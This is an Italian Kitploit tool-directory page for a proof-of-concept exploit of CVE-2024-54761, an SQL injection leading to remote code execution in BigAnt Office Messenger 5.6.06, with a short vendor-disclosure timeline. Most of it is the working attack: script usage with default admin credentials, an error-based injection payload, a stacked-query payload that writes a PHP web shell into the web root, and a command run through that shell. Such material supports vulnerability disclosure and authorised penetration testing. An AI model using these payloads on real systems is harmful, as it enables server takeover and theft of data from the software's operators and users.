Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-54761 — CVE-2024-54761 PoC | Kitploit
Strumenti/GitHubGitHub/nscan9/cve-2024-54761
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubnscan9/cve-2024-54761

CVE-2024-54761

CVE-2024-54761 PoC

Vedi Repository
10 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

BigAnt Office Messenger 5.6.06 RCE tramite SQL Injection

La vulnerabilità di SQL injection in BigAnt Messenger provoca una vulnerabilità RCE. Segui i passaggi per sfruttarla.

Utilizzo:

root@kitploit:~
CVE-2024-54761.py [-h] -r RHOST [-p RPORT] [-u USERNAME] [-P PASSWORD]
options:
  -h, --help            show this help message and exit
  -r, --rhost RHOST     Target IP address
  -p, --rport RPORT     Target port (default 8000)
  -u, --username USERNAME
                        Login username (default admin)
  -P, --password PASSWORD
                        Login password (default 123456)

Esegui l'exploit con le credenziali predefinite.

root@kitploit:~
python CVE-2024-54761.py -r 127.0.0.1
exploit

Exploit manuale

Estrai la versione del database utilizzando il parametro dev_code esposto a SQLi.

root@kitploit:~
# Payload
?dev_code=AND EXTARCTVALUE(rand(),concat(CHAR(126),version(),CHAR(126)))--

SQLI version Carica una webshell PHP sul target utilizzando query impilate SQL.

root@kitploit:~
# Payload
?dev_code=;SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php'-- -

crate webshell 1 Prova dell'esecuzione del comando:

root@kitploit:~
/shell.php?cmd=whoami

whoami command dir

Cronologia

31-10-2024: Vulnerabilità inviate al vendor via email

31-10-2024: Inviata email al vendor, nessuna risposta

15-11-2024: Inviata email al vendor, nessuna risposta

15-11-2024: Richiesti CVE

Riferimenti

https://gist.github.com/nscan9/a31982c90ab40a8e00373bf15efbf52a
https://www.bigantsoft.com

Scarica lo strumento